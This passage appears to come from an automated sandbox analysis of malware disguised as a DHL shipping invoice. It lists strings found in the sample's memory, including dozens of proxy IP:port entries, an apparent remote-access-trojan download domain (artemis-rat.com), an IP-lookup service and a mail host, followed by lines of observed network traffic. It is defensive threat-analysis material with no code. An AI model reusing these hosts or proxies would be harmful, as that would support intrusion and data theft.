                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.70.195.145:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.73.239.124:55443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.73.239.124:55443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.75.76.3:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:44734
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:44734://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.237.46:45738
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.237.46:45738://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.143.12.201:60505
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.158.179.216:32799
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.158.179.216:32799://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.164.89.123:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98039A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.164.89.123:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.17.79:3888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.17.79:3888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.16.254:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.16.254:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9816F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.43.244.15:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.149.8:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.149.8:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.57.216.118:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.57.216.118:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983567000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.70.220.173:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.70.220.173:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.84.166.138:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.84.166.138:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.70.52.227:48324
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.70.52.227:48324://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.103.88.158:46104
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.103.88.158:46104://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.29:31679
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.29:31679://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.4:31654
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.4:31654://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.175.31.195:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.175.31.195:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.178.72.21:10919
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.178.72.21:10919://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.80:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.80:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.150:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.150:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.6.197.202:16099
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.6.197.202:16099://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.64.169.17:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.64.169.17:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artemis-rat.com:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980701000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9821DC000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982245000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98236A000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C03000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98362B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BD2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://batit.aliyun.com/alww.html?id=00000000003887822894
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815A2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981534000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.pki.goog/gts1p5/ZLjfCcC0tzo.crl0
                Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegAsm.exe, 00000002.00000002.2903520132.000000000291B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2903520132.00000000029D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.orako.co.ke
                Source: RegAsm.exe, 00000002.00000002.2903520132.000000000291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.orako.co.ke(
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815A2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981534000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01
                Source: RegAsm.exe, 00000002.00000002.2903520132.000000000291B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2903520132.00000000029D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://orako.co.ke
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815A2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981534000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1p5.der0
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980001000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2903520132.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983AA4000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981FEF000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98354E000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9805E4000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98230C000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.freecsstemplates.org
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9805E4000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.squid-cache.org/Artwork/SN.png
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98227D000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                Source: RegAsm.exe, 00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                Source: RegAsm.exe, 00000002.00000002.2903520132.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: RegAsm.exe, 00000002.00000002.2903520132.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: RegAsm.exe, 00000002.00000002.2903520132.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E60000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983300000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65eef7f7c904
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980001000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65eef7f7c9042c7a6dda827e
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65eef7f7c904p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto&display=swap
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://globalurl.fortinet.net:8010/XX/YY/ZZ/CI/MGPGHGPGPFGHDDPFGGHGFHBGCHEGPFBGAHAH)
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98227D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.zscaler.net/img_logo_new1.png
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.zscloud.net/img_logo_new1.png
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9803EF000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.xp.cn
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54651
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51389
                Source: unknownNetwork traffic detected: HTTP traffic on port 55114 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55137 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51709
                Source: unknownNetwork traffic detected: HTTP traffic on port 55406 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52335 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54992 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 54728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51717
                Source: unknownNetwork traffic detected: HTTP traffic on port 52266 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51718
                Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52341 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50634
                Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50634 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50636
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53109
                Source: unknownNetwork traffic detected: HTTP traffic on port 54156 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55403
                Source: unknownNetwork traffic detected: HTTP traffic on port 52215 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55404
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55405
                Source: unknownNetwork traffic detected: HTTP traffic on port 51784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55406
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55642
                Source: unknownNetwork traffic detected: HTTP traffic on port 53109 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52261
                Source: unknownNetwork traffic detected: HTTP traffic on port 54958 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52266
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53113
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52264
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53117
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54206
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53116
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52270
                Source: unknownNetwork traffic detected: HTTP traffic on port 54930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54196 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                Source: unknownNetwork traffic detected: HTTP traffic on port 53191 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 52095 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 54097 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51585
                Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52213 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54956 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50335 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55362 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52204
                Source: unknownNetwork traffic detected: HTTP traffic on port 51005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54196
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55405 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52332
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52211
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54995
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52212
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54994
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52210
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51005
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52215
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51006
                Source: unknownNetwork traffic detected: HTTP traffic on port 52088 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52213
                Source: unknownNetwork traffic detected: HTTP traffic on port 51935 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52214
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52335
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54996
                Source: unknownNetwork traffic detected: HTTP traffic on port 52340 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53192 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52340
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52264 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55404 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 54996 -> 443
